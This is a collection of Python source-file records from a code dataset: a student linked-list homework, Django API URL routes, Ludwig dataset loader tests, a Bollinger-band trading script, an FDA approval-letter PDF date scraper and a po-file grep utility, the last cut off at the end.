= node.value\n while this_node != None: # iterate over the entire list\n if this_node.value == value: # if values match\n return this_node\n else:\n this_node = this_node.next # keep iterating\n\n\n# LinkedList class\nclass LinkedList():\n def __init__(self, value):\n # takes a number and sets it as the value at the head of the List\n self.value = value\n self.size = 1 # initial length of 1\n\n def length(self):\n # returns the length of the list\n return print(\"Length is \" + str(self.size))\n\n def addNode(self, new_value):\n # takes a number and adds it to the end of the list\n # check for correct type\n if type(new_value) != int:\n print(\"input must be an integer\")\n else:\n # create a new node\n new_node = Node(new_value) # make a new node\n # find the end of a list\n # first, create an object for the current node (root)\n this_node = self.value\n # while loop to iterate until end of list (next value = None)\n while this_node.next != None:\n this_node = this_node.next # reset the current node\n # the loop ends when next node is empty\n # time to add the new node\n this_node.next = new_node\n # increase the length\n self.size += 1\n\n def addNodeAfter(self, new_value, after_node):\n # takes a number and add it after the after_node\n # check for correct type\n if type(new_value) != int:\n print(\"input must be an integer\")\n else:\n # find the afternode from integer input\n afternode = NodeFromValue(node = self, value = after_node)\n # create a new node with value and link\n new_node = Node(_value = new_value, _next = afternode.next)\n # we can insert new node between after_node and its next node\n afternode.next = new_node\n self.size += 1\n print(\"Added \" + str(new_value) + \" after \" + str(after_node))\n\n def addNodeBefore(self, new_value, before_node):\n # takes a value and adds it before the before_node\n # check for correct type\n if type(new_value) != int:\n print(\"input must be an integer\")\n else:\n # find the beforenode from integer input\n beforenode = NodeFromValue(node = self, value = before_node)\n # create a new node with value and link\n new_node = Node(_value = new_value, _next = beforenode.value)\n # find a node before the before_node\n # set current node\n this_node = self.value\n # if you want to insert before the first node\n if this_node == beforenode:\n new_node.next = this_node # make the connection\n self.value = new_node # reset the root node\n else:\n while this_node.next != beforenode:\n this_node = this_node.next\n # we can insert new node between this_node and before_node\n this_node.next = new_node\n self.size += 1\n print(\"Added \" + str(new_value) + \" before \" + str(before_node))\n\n def removeNode(self, node_to_remove):\n # find the node_to_remove\n # transform integer into node\n that_node = NodeFromValue(node = self, value = node_to_remove)\n this_node = self.value\n # if you want to remove the first node\n if this_node == that_node:\n self.value = this_node.next # reset the root to the next node\n else:\n # iterate until we find the previous node of the node to remove\n while this_node.next != that_node:\n this_node = this_node.next\n # make a link that skips that_node\n this_node.next = that_node.next\n self.size -= 1\n print(\"Removed \" + str(that_node.value))\n\n\n def removeNodeByValue(self, value):\n # takes a value and removes all nodes with that value\n this_node = self.value\n while this_node.next != None: # iterate over the whole list\n if this_node.value == value: # if value matches\n self.removeNode(this_node.value)\n this_node = this_node.next\n\n\n def reverse(self):\n # reverses the order of the linked list\n previous_node = None # start with an empty node\n this_node = self.value # get root node\n while this_node != None: # iterate over the whole list\n next_node = this_node.next # save the next node\n this_node.next = previous_node # switch place\n previous_node = this_node # switch place\n this_node = next_node # move on to the next node\n self.value = previous_node # reset the root\n print(\"Reversed\")\n\n def __str__(self):\n # displays the list in some reasonable way\n lists = \"\"\n this_node = self.value\n while this_node != None:\n lists += str(this_node.value) + \" \"\n this_node = this_node.next\n return lists\n\n# All of these functions iterate over the list until they find some match\n# and execute some move. This is essentially iterating n-1 times and make 1 move,\n# which is complexity O(n). I think it is the best possible complexity class.\n\n##### Tests\nfirst_node = Node(5)\nmy_list = LinkedList(first_node)\nmy_list.addNode(25)\nmy_list.addNode(5)\nmy_list.addNode(5)\nprint(my_list) # should print 5 25 5 5\nmy_list.length() # should be 4\nmy_list.addNode(\"Mon\") # should throw error message\nmy_list.addNodeBefore(9, 5)\nmy_list.addNodeAfter(2, 5)\nmy_list.reverse()\nprint(my_list) # should print 5 5 25 2 5 9\nmy_list.removeNode(5) # removes the first instance of 5\nmy_list.removeNodeByValue(5) # removes all five\nprint(my_list) # should print 25 2 9\nmy_list.length() # should be 3\n","sub_path":"HW/hw5.py","file_name":"hw5.py","file_ext":"py","file_size_in_byte":6275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"546736180","text":"#!/usr/bin/env python\n##\n## Copyright 2009 Adriana Lukas & Alec Muffett\n##\n## Licensed under the Apache License, Version 2.0 (the \"License\"); you\n## may not use this file except in compliance with the License. You\n## may obtain a copy of the License at\n##\n## http://www.apache.org/licenses/LICENSE-2.0\n##\n## Unless required by applicable law or agreed to in writing, software\n## distributed under the License is distributed on an \"AS IS\" BASIS,\n## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n## implied. See the License for the specific language governing\n## permissions and limitations under the License.\n##\n\n\"\"\"docstring goes here\"\"\" # :-)\n\nfrom django.conf.urls.defaults import *\n\nimport views as api\nfrom pymine.views import API_CALL, REST\n\nurlpatterns = patterns('',\n\t\t (r'^vurl\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.create_vurl,\n\t\t\t\t 'GET': api.list_vurls }),\n\t\t (r'^vurl/(?P[1-9]\\d*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_vurl,\n\t\t\t\t 'GET': api.read_vurl,\n\t\t\t\t 'POST': api.update_vurl }),\n\t\t (r'^vurl/(?P[1-9]\\d*)/(?P(__)?[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_vurl_key,\n\t\t\t\t 'GET': api.get_vurl_key }),\n\t\t (r'^version\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'GET': api.read_version }),\n\t\t (r'^url/(?P[1-9]\\d*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'GET': api.encode_minekey1 }),\n\t\t (r'^url/(?P[1-9]\\d*)/(?P[1-9]\\d*)/(?P\\d+)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'GET': api.encode_minekey3 }),\n\t\t (r'^url/(?P[1-9]\\d*)/(?P\\d+)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'GET': api.encode_minekey2 }),\n\t\t (r'^tag\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.create_tag,\n\t\t\t\t 'GET': api.list_tags }),\n\t\t (r'^tag/(?P[1-9]\\d*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_tag,\n\t\t\t\t 'GET': api.read_tag,\n\t\t\t\t 'POST': api.update_tag }),\n\t\t (r'^tag/(?P[1-9]\\d*)/(?P(__)?[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_tag_key,\n\t\t\t\t 'GET': api.get_tag_key }),\n\t\t (r'^relation\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.create_relation,\n\t\t\t\t 'GET': api.list_relations }),\n\t\t (r'^relation/(?P[1-9]\\d*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_relation,\n\t\t\t\t 'GET': api.read_relation,\n\t\t\t\t 'POST': api.update_relation }),\n\t\t (r'^relation/(?P[1-9]\\d*)/(?P(__)?[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_relation_key,\n\t\t\t\t 'GET': api.get_relation_key }),\n\t\t (r'^registry\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'GET': api.list_registry }),\n\t\t (r'^registry/(?P[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.amend_registry_key,\n\t\t\t\t 'DELETE': api.delete_registry_key,\n\t\t\t\t 'GET': api.get_registry_key }),\n\t\t (r'^item\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.create_item,\n\t\t\t\t 'GET': api.list_items }),\n\t\t (r'^item/(?P\\d+)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_item,\n\t\t\t\t 'GET': api.read_item,\n\t\t\t\t 'POST': api.update_item }),\n\t\t (r'^item/(?P\\d+)/(?P(__)?[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_item_key,\n\t\t\t\t 'GET': api.get_item_key }),\n\t\t (r'^item/(?P\\d+)$',\n\t\t\tREST, { 'GET': api.read_item_data }),\n\t\t (r'^ie/import\\.(?P(zip|tar))$',\n\t\t\tAPI_CALL, { 'GET': api.import_mine }),\n\t\t (r'^ie/export\\.(?P(zip|tar))$',\n\t\t\tAPI_CALL, { 'GET': api.export_mine }),\n\t\t (r'^comment/item/(?P\\d+)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'POST': api.create_comment,\n\t\t\t\t 'GET': api.list_comments }),\n\t\t (r'^comment/(?P[1-9]\\d*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_comment,\n\t\t\t\t 'GET': api.read_comment,\n\t\t\t\t 'POST': api.update_comment }),\n\t\t (r'^comment/(?P[1-9]\\d*)/(?P(__)?[A-Za-z][_A-Za-z]*)\\.(?P(rdr|xml|json|raw))$',\n\t\t\tAPI_CALL, { 'DELETE': api.delete_comment_key,\n\t\t\t\t 'GET': api.get_comment_key }),\n\t\t )\n","sub_path":"old/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"545035293","text":"import os\nfrom unittest import mock\n\nimport pandas as pd\nimport pytest\n\nimport ludwig.datasets\nfrom ludwig.datasets.dataset_config import DatasetConfig\nfrom ludwig.datasets.loaders.dataset_loader import DatasetState\n\nSUPPORTED_UNCOMPRESSED_FILETYPES = [\"json\", \"jsonl\", \"tsv\", \"csv\"]\n\n\ndef test_load_csv_dataset(tmpdir):\n input_df = pd.DataFrame(\n {\"name\": [\"Raphael\", \"Donatello\"], \"mask\": [\"red\", \"purple\"], \"weapon\": [\"sai\", \"bo staff\"], \"split\": [0, 1]}\n )\n\n extracted_filename = \"input.csv\"\n compression_opts = dict(method=\"zip\", archive_name=extracted_filename)\n\n archive_filename = os.path.join(tmpdir, \"archive.zip\")\n input_df.to_csv(archive_filename, index=False, compression=compression_opts)\n\n config = DatasetConfig(\n version=1.0,\n name=\"fake_csv_dataset\",\n download_urls=[\"file://\" + archive_filename],\n )\n\n ludwig.datasets._get_dataset_configs.cache_clear()\n with mock.patch(\"ludwig.datasets._load_dataset_config\", return_value=config):\n dataset = ludwig.datasets.get_dataset(\"fake_csv_dataset\", cache_dir=tmpdir)\n\n assert not dataset.state == DatasetState.DOWNLOADED\n assert not dataset.state == DatasetState.TRANSFORMED\n\n output_df = dataset.load()\n pd.testing.assert_frame_equal(input_df, output_df)\n\n assert dataset.state == DatasetState.TRANSFORMED\n ludwig.datasets._get_dataset_configs.cache_clear()\n\n\n@pytest.mark.parametrize(\"f_type\", SUPPORTED_UNCOMPRESSED_FILETYPES)\ndef test_multifile_join_dataset(tmpdir, f_type):\n if f_type != \"jsonl\":\n train_df = pd.DataFrame(\n {\"name\": [\"Raphael\", \"Donatello\"], \"mask\": [\"red\", \"purple\"], \"weapon\": [\"sai\", \"bo staff\"]}\n )\n\n test_df = pd.DataFrame({\"name\": [\"Jack\", \"Bob\"], \"mask\": [\"green\", \"yellow\"], \"weapon\": [\"knife\", \"gun\"]})\n\n val_df = pd.DataFrame({\"name\": [\"Tom\"], \"mask\": [\"pink\"], \"weapon\": [\"stick\"]})\n else:\n train_df = pd.DataFrame([{\"name\": \"joe\"}, {\"mask\": \"green\"}, {\"weapon\": \"stick\"}])\n test_df = pd.DataFrame([{\"name\": \"janice\"}, {\"mask\": \"black\"}, {\"weapon\": \"gun\"}])\n val_df = pd.DataFrame([{\"name\": \"sara\"}, {\"mask\": \"pink\"}, {\"weapon\": \"gun\"}])\n\n # filetypes = ['json', 'tsv', 'jsonl']\n train_filename = \"train.\" + f_type\n test_filename = \"test.\" + f_type\n val_filename = \"val.\" + f_type\n train_filepath = os.path.join(tmpdir, train_filename)\n test_filepath = os.path.join(tmpdir, test_filename)\n val_filepath = os.path.join(tmpdir, val_filename)\n\n if f_type == \"json\":\n train_df.to_json(train_filepath)\n test_df.to_json(test_filepath)\n val_df.to_json(val_filepath)\n elif f_type == \"jsonl\":\n train_df.to_json(train_filepath, orient=\"records\", lines=True)\n test_df.to_json(test_filepath, orient=\"records\", lines=True)\n val_df.to_json(val_filepath, orient=\"records\", lines=True)\n elif f_type == \"tsv\":\n train_df.to_csv(train_filepath, sep=\"\\t\")\n test_df.to_csv(test_filepath, sep=\"\\t\")\n val_df.to_csv(val_filepath, sep=\"\\t\")\n else:\n train_df.to_csv(train_filepath)\n test_df.to_csv(test_filepath)\n val_df.to_csv(val_filepath)\n\n config = DatasetConfig(\n version=1.0,\n name=\"fake_multifile_dataset\",\n download_urls=[\"file://\" + train_filepath, \"file://\" + test_filepath, \"file://\" + val_filepath],\n train_filenames=train_filename,\n validation_filenames=val_filename,\n test_filenames=test_filename,\n )\n\n ludwig.datasets._get_dataset_configs.cache_clear()\n with mock.patch(\"ludwig.datasets._load_dataset_config\", return_value=config):\n dataset = ludwig.datasets.get_dataset(\"fake_multifile_dataset\", cache_dir=tmpdir)\n\n assert not dataset.state == DatasetState.DOWNLOADED\n assert not dataset.state == DatasetState.TRANSFORMED\n\n output_df = dataset.load()\n assert output_df.shape[0] == train_df.shape[0] + test_df.shape[0] + val_df.shape[0]\n\n assert dataset.state == DatasetState.TRANSFORMED\n ludwig.datasets._get_dataset_configs.cache_clear()\n","sub_path":"tests/ludwig/datasets/test_datasets.py","file_name":"test_datasets.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"198110112","text":"import pandas as pd\r\nimport numpy as np\r\nimport datetime as dt\r\nimport os\r\nfrom util import get_data\r\nimport matplotlib.pyplot as plt\r\nimport csv\r\n\r\n'''\r\nChart should include\r\n- stock price\r\n- simple moving average\r\n- Upper Bollinger Band\r\n- Lower Bollinger Band\r\n- Long entries (buy 100 shares) as vertical green line at time of entry\r\n- Long exits (sell 100 shares) as vertical black line at time of exit\r\n- Short entries as vertical red line at time of entry\r\n- Short exits as vertical black line at time of exit\r\n\r\nCan only run 1 strategy at a time. For example, if we have already entered a long position (bought 100 shares),\r\nwe must wait until we exit (sell 100 shares) before we can take any other position\r\n'''\r\n\r\n# Using fixed start and end dates with only one stock (IBM)\r\n# Dec 31, 2007 to Dec 31, 2009\r\ndef process_Bollinger_Bands(window_size=20, syms=['IBM'], sd=dt.datetime(2007,12, 31), ed = dt.datetime(2009, 12, 31)):\r\n \r\n prices_dates = pd.date_range(sd, ed)\r\n prices_all = get_data(syms, prices_dates) # Includes SPY\r\n prices_SPY = prices_all['SPY']\r\n prices = prices_all[syms] \r\n prices_orig = prices.copy()\r\n\r\n # Calculate 20 day simple moving average\r\n # Note that the method used will return a vector the same size as\r\n # the input vector. However, we are using a 20 day window, so the first\r\n # 20 entries are invalid\r\n prices_array = prices.values\r\n sma = moving_average(prices_array[:,0], window_size)\r\n sma[0:window_size-1] = np.nan\r\n\r\n # Calculate standard deviation of SMA\r\n std_dev = standard_deviation(prices_array[:,0], window_size)\r\n std_dev[0:window_size-1] = np.nan\r\n \r\n # Create upper and lower bands\r\n upper_band = sma + 2*std_dev\r\n lower_band = sma - 2*std_dev\r\n\r\n # Add data to data frame\r\n prices['SMA'] = sma\r\n prices['Upper Band'] = upper_band\r\n prices['Lower Band'] = lower_band\r\n\r\n # Plot data frame\r\n plot_handle = plot_data(prices)\r\n\r\n # Now we need to take this data and find where to make trades\r\n orders = prices_orig.copy()\r\n orders[syms] = np.NaN\r\n generate_orders(prices, orders)\r\n \r\n # Save this off to a csv file\r\n write_csv_file(orders)\r\n\r\n # Add the orders to the plot\r\n add_orders_to_plot(plot_handle, orders)\r\n\r\n plt.show()\r\n#end generate plot\r\n\r\ndef generate_orders(prices, orders, window_size=20, sym='IBM'):\r\n\r\n long_active = False\r\n short_active = False\r\n # For each row (date) in the prices file for which we have\r\n # data to compare \r\n for i in range(window_size, prices.shape[0]):\r\n # Get stock price\r\n price_today = prices[sym][i]\r\n price_yester = prices[sym][i-1]\r\n # Get the value of the upper and lower bands\r\n ub_today = prices['Upper Band'][i]\r\n lb_today = prices['Lower Band'][i]\r\n ub_yester = prices['Upper Band'][i-1]\r\n lb_yester = prices['Lower Band'][i-1]\r\n # Get simple moving average prices\r\n sma_today = prices['SMA'][i]\r\n sma_yester = prices['SMA'][i-1]\r\n\r\n # There are several different scenarios\r\n # 1) Stock price goes from below the lower band to above the lower band we have a long opportunity\r\n # We should buy 100 shares\r\n if (not long_active) and (not short_active) and (price_yester < lb_yester) and (price_today >= lb_today):\r\n orders.iloc[i][sym] = 100.0\r\n long_active = True\r\n # 2) Stock price moves from above the upper band to below the upper band\r\n # This signals the stock is over valued and is returning to mean. Short the stock\r\n elif (not long_active) and (not short_active) and (price_yester > ub_yester) and (price_today <= ub_today):\r\n orders.iloc[i][sym] = -100.0\r\n short_active = True\r\n # These two cases handle if a trade is active, when we should exit\r\n # If we are in a long position, sell the stock when the price moves from below the SMA to above the SMA\r\n elif (long_active) and (price_yester < sma_yester) and (price_today >= sma_today):\r\n orders.iloc[i][sym] = -100.0\r\n long_active = False\r\n # If we are in a short position, buy the stock when the price moves from above SMA to below it\r\n elif (short_active) and (price_yester > sma_yester) and (price_today <= sma_today):\r\n orders.iloc[i][sym] = 100.0\r\n short_active = False\r\n #end if\r\n #end for\r\n \r\n # Drop all the entries that don't have values\r\n orders.dropna(inplace=True)\r\n # orders should be pass by reference, so I shouldn't need to return anything here\r\n#end generate_orders\r\n\r\ndef write_csv_file(orders, filename='orders/BBorders.csv'):\r\n with open(filename, 'wb') as csvfile:\r\n orderswriter = csv.writer(csvfile, delimiter=',',\r\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\r\n\r\n # Write header\r\n orderswriter.writerow(['Date'] + ['Symbol'] + ['Order'] + ['Shares'])\r\n \r\n # For each order, write to file\r\n for i in range(0,orders.shape[0]):\r\n # Get the date\r\n current_dt = str(orders.index[i])[0:10]\r\n \r\n # Get the order type\r\n order_type = 'BUY'\r\n if orders.iloc[i]['IBM'] <= 0:\r\n order_type = 'SELL'\r\n\r\n # This is all we need to know. The other data is constant\r\n orderswriter.writerow([current_dt] + ['IBM'] + [order_type] + ['100']) \r\n #end for\r\n #end with\r\n#end write_csv_file\r\n\r\n'''Adds vertical lines to specified plot'''\r\ndef add_orders_to_plot(plot_handle, orders, min=60, max=130):\r\n '''\r\n Since I can only have one order outstanding at a time, I am going to assume\r\n the incoming data is correct. That means that every other order should be\r\n an exit. \r\n '''\r\n long = False\r\n short = False\r\n color = 'k' #black\r\n for i in range(0,orders.shape[0]):\r\n current_date = orders.index[i]\r\n current_order = orders.iloc[i]['IBM']\r\n\r\n # Determine what position (short, long) we are in and set the color\r\n # If we are in neither a long nor a short position\r\n if (not long) and (not short):\r\n # If a sell order comes in, we are short\r\n if current_order < 0:\r\n color = 'r' #red\r\n short = True\r\n # If a buy order comes in, we are long\r\n elif current_order > 0:\r\n color = 'g' #green\r\n long = True\r\n #endif\r\n # Every other order will be an exit, so just set color to black\r\n elif long or short:\r\n color = 'k'\r\n long = short = False\r\n #end if\r\n\r\n plot_handle.plot([current_date, current_date], [min, max], color) \r\n #end for\r\n#end add_orders_to_plot\r\n\r\n''' Computes the moving average of data over the specified window '''\r\ndef moving_average(data, window_size):\r\n output = np.zeros((data.shape[0]))\r\n\r\n for i in range(window_size-1, data.shape[0]):\r\n output[i] = data[i-window_size+1:i+1].mean()\r\n #end for\r\n return output\r\n#end moving_average\r\n\r\n''' Computes standard deviation of data over the specified window''' \r\ndef standard_deviation(data, window_size):\r\n output = np.zeros( (data.shape[0]) )\r\n\r\n for i in range(window_size-1, data.shape[0]):\r\n output[i] = np.std( data[i-window_size+1:i+1], ddof=1 )\r\n #end for\r\n\r\n return output\r\n#end standard_deviation\r\n\r\n'''Plots data. Returns handle to plot'''\r\ndef plot_data(df, title=\"Stock prices\", xlabel=\"Date\", ylabel=\"Prices\"):\r\n \r\n ax = df.plot()\r\n ax.set_xlabel(xlabel)\r\n ax.set_ylabel(ylabel)\r\n \r\n return ax\r\n#end plot_data\r\n","sub_path":"ML4Trading/ml4t/mc2_p2/bollinger_strategy.py","file_name":"bollinger_strategy.py","file_ext":"py","file_size_in_byte":7734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"200551835","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 10 14:27:16 2019\n\n@author: gabrieleusan\n\"\"\"\n\nimport os\nfrom os import path\nimport PyPDF2 \nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom glob import glob \nimport pandas as pd\nimport textract\nimport numpy as np\n\nos.chdir(\"/Users/gabrieleusan/Desktop/approval_letters/2008\")\n\nstop_words = ['January', 'February', 'March', 'April', 'May', 'June', 'July',\n 'August', 'September', 'October', 'November', 'December']\n\nfor i in range(1,32):\n stop_words.append(str(i))\n\nfor i in range(1900, 2020):\n stop_words.append(str(i)) \n\nmonths = ['January', 'February', 'March', 'April', 'May', 'June', 'July',\n 'August', 'September', 'October', 'November', 'December']\n\ndef find_ext(dr, ext):\n return glob(path.join(dr,\"*.{}\".format(ext)))\n\npdfs = find_ext(\".\",\"pdf\")\n\nnda_dates = {}\n\nfor pdf in pdfs:\n filename = pdf\n pdfFileObj = open(filename,'rb')\n pdfReader = PyPDF2.PdfFileReader(pdfFileObj)\n num_pages = pdfReader.numPages\n count = 0\n text = \"\"\n\n while count < num_pages:\n try:\n pageObj = pdfReader.getPage(count)\n count +=1\n text += pageObj.extractText()\n except TypeError:\n pass\n except IndexError:\n pass\n \n# if text != \"\":\n# text = text\n##If the above returns as False, we run the OCR library textract to #convert scanned/image based PDF files into text\n# else:\n# text = textract.process(filename, method='tesseract', language='eng')\n \n \n keyword = 'dated'\n text = text.partition(keyword)\n text = text[2]\n \n tokens = word_tokenize(text) \n keywords = [word for word in tokens if word in stop_words]\n n = 6\n nda_number = [filename[i:i+n] for i in range(2, len(filename), n)] \n nda_number = nda_number[0]\n \n date = keywords[:3]\n date = pd.to_datetime(date[0] + '/' + date[1] + '/' + date[2])\n \n nda_dates[nda_number] = date\n \n \ndf = pd.DataFrame(nda_dates, index=[0]).T.reset_index()\ndf.rename(columns={'index':'nda_num', 0:'submission_date'}, inplace=True)\n \nprint(df.head())\n","sub_path":"scraping_code.py","file_name":"scraping_code.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"98263992","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n#******************************************************************************\n# Copyright (C) 2017-2018 Hitoshi Yamauchi\n# New BSD License.\n#******************************************************************************\n# \\file\n# \\brief grep for pofiles\n#\n# Description:\n# Get specific pattern entries in the po file. You can search\n# depends on the key.\n#\n# Example:\n# Grep on msgid with keywords 'this' for file _other_.po\n# ./pogrep.py --key-type msgid -e this _other_.po\n#\n# Get exercise decimals-in-words for file learn.math.cc-fourth-grade-math.exercises-ja.po\n# ./pogrep.py --key-type tcomment -e decimals-in-words learn.math.cc-fourth-grade-math.exercises-ja.po\n#\nimport argparse, sys, re, codecs, os\nimport polib\n\nclass Pogrep(object):\n \"\"\"grep on pofile.\n Search depends on keytype: msgid, msgstr, comment, tcomment\n Out put matching entry\n \"\"\"\n\n def __init__(self, opt_dict):\n \"\"\"constructor\n \"\"\"\n self.__opt_dict = opt_dict\n self.__is_verbose = self.__opt_dict['verbose']\n\n # key type\n self.__key_type = self.__opt_dict['key_type']\n if (self.__key_type == None):\n raise RuntimeError('No key type specified')\n valid_key_type = ['msgid', 'msgstr', 'comment', 'tcomment']\n if (self.__key_type not in valid_key_type):\n raise RuntimeError('Invalid key_type')\n self.__verbose_out('# key_type: {0}'.format(self.__key_type))\n\n # regexp\n restr = self.__opt_dict['regexp']\n if (restr == None):\n raise RuntimeError('No regexp specified')\n ignore_case_str = ''\n if (self.__opt_dict['ignore_case'] == True):\n self.__recomp = re.compile(restr, flags=re.IGNORECASE)\n ignore_case_str = 'with ignore case'\n else:\n self.__recomp = re.compile(restr)\n self.__verbose_out('# regexp: {0} {1}'.format(restr, ignore_case_str))\n\n # inevert match\n self.__match_true = not self.__opt_dict['invert_match']\n self.__verbose_out('# match true (!invert_match): {0}'.format(self.__match_true))\n\n # in_file\n self.__in_file = self.__opt_dict['in_file']\n if (self.__in_file == None):\n raise RuntimeError('No input file')\n\n self.__verbose_out('# in_file: {0}'.format(self.__in_file))\n\n # out_file\n self.__out_file = self.__opt_dict['out_file']\n if (self.__out_file == None):\n raise RuntimeError('No output file')\n self.__out_file_obj = None\n\n self.__verbose_out('# out_file: {0}'.format(self.__out_file))\n\n # FIXME\n self.__force_override = False\n\n\n def __verbose_out(self, mes):\n \"\"\"verbose output if self.__is_verbose is True\n \"\"\"\n if (self.__is_verbose == True):\n print(mes)\n\n def __is_match(self, ent):\n \"\"\"Check the entry matches the current condition.\n \"\"\"\n check_str = None\n if (self.__key_type == 'msgid'):\n check_str = ent.msgid\n elif (self.__key_type == 'msgstr'):\n check_str = ent.msgstr\n elif (self.__key_type == 'comment'):\n check_str = ent.comment\n elif (self.__key_type == 'tcomment'):\n check_str = ent.tcomment\n else:\n raise RuntimeError('Unknown key_type')\n\n assert(check_str != None)\n # print('# check_str: '+ check_str)\n # Here must be search(). If match it only compare at the top of the line.\n is_found = self.__recomp.search(check_str) != None\n\n return self.__match_true == is_found\n\n def __out(self, out_str):\n \"\"\"output out_str\"\"\"\n if (self.__out_file_obj != None):\n self.__out_file_obj.write(out_str + '\\n')\n else:\n print(out_str + '\\n')\n\n\n def __process_po_obj(self, po_in):\n \"\"\"process one file\n \"\"\"\n\n # Entry members (see the polib documentation, actually source\n # code of POEntry)\n #\n # comment: string, the entry comment.\n # tcomment: string, the entry translator comment.\n # occurrences: list, the entry occurrences.\n # flags: list, the entry flags.\n # previous_msgctxt: string, the entry previous context.\n # previous_msgid: string, the entry previous msgid.\n # previous_msgid_plural: string, the entry previous msgid_plural.\n # linenum: integer, the line number of the entry\n #\n # Then, msgid, msgstr, (msgcxt)\n for ent in po_in:\n if (self.__is_match(ent) == True):\n self.__out(str(ent))\n else:\n # print('# no match')\n pass\n\n\n def run(self):\n \"\"\"run the po file grep\"\"\"\n\n self.__verbose_out('# Loading {0}'.format(self.__in_file))\n po_in = polib.pofile(self.__in_file, encoding='utf-8')\n self.__verbose_out('# loading done')\n\n\n if (self.__out_file != \"-\"):\n if (os.path.isfile(self.__out_file) and (self.__force_override == False)):\n raise RuntimeError('output file [{0}] exists.'.format(self.__out_file))\n with open(self.__out_file, encoding='utf-8', mode='w') as out_file:\n self.__out_file_obj = out_file\n self.__process_po_obj(po_in)\n else:\n self.__process_po_obj(po_in)\n\n\n @staticmethod\n def get_version_number():\n \"\"\"get the version number list\n [major, minor, maintainance]\n \"\"\"\n return [0, 2, 0]\n\n @staticmethod\n def get_version_string():\n \"\"\"get version information as a string\"\"\"\n vl = Pogrep.get_version_number()\n\n return '''pogrep.py {0}.{1}.{2}\nNew BSD License.\nCopyright (C) 2017-2018 Hitoshi Yamauchi\n'''.format(vl[0], vl[1], vl[2])\n\n\n\ndef pogrep_main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"in_file\", type=str, nargs=1,\n help=\"Input filenames.\")\n\n parser.add_argument(\"out_file\", type=str, default=\"-\", nargs=\"?\",\n help=\"Output filename (- is stdout)\")\n\n parser.add_argument(\"--key-type\", type=str,\n choices=['msgid', 'msgstr', 'comment', 'tcomment'], default='msgid',\n help=\"grep this key type in a po file\")\n\n # nargs tells how many args should be consumed, this is needed when\n # the regex start with '-'. Note: this gives the args in a list.\n parser.add_argument(\"-e\", \"--regexp\", type=str, nargs=1,\n help=\"Use regrep pattern for search. \"\n \"If you need the pattern starts with '-', \"\n \"use = option like -e='-pattern'.\")\n\n parser.add_argument(\"-v\", \"--invert-match\", action=\"store_true\",\n help=\"Invert the sense of matching. \"\n \"This selects non-matching entries.\")\n\n parser.add_argument(\"-i\", \"--ignore-case\", action=\"store_true\",\n help=\"Ignore the case in both the regexp match string \"\n \"and the input file.\")\n\n parser.add_argument(\"--force_override\", action='store', default='0',\n help=\"Even outfile is found, override the output file.\")\n\n parser.add_argument(\"--verbose\", action=\"store_true\",\n help=\"increase output verbosity\")\n\n parser.add_argument(\"-V\", \"--version\", action=\"store_true\",\n help=\"output the version number of pogrep.py\")\n\n args = parser.parse_args()\n\n # Switch stdout codecs to utf-8\n sys.stdout = codecs.getwriter(\"utf-8\")(sys.stdout.detach())\n\n if (args.version == True):\n sys.stderr.write(Pogrep.get_version_string())\n sys.exit(1)\n\n if (args.regexp == None):\n raise RuntimeError('-e/--regexp option was not specified.')\n\n opt_dict = {\n 'in_file': args.in_file[0], # nargs gives a list, but we need one\n 'out_file': args.out_file,\n 'key_type': args.key_type,\n 'regexp': args.regexp[0], # nargs gives a list, but we need one\n 'invert_match': args.invert_match,\n 'ignore_case': args.ignore_case,\n 'force_override': args.force_override,\n 'verbose': args.verbose,\n }\n\n pogrep = Pogrep(opt_dict)\n pogrep.run()\n\n\nif __name__ == \"__main__\":\n try:\n pogrep_main()\n 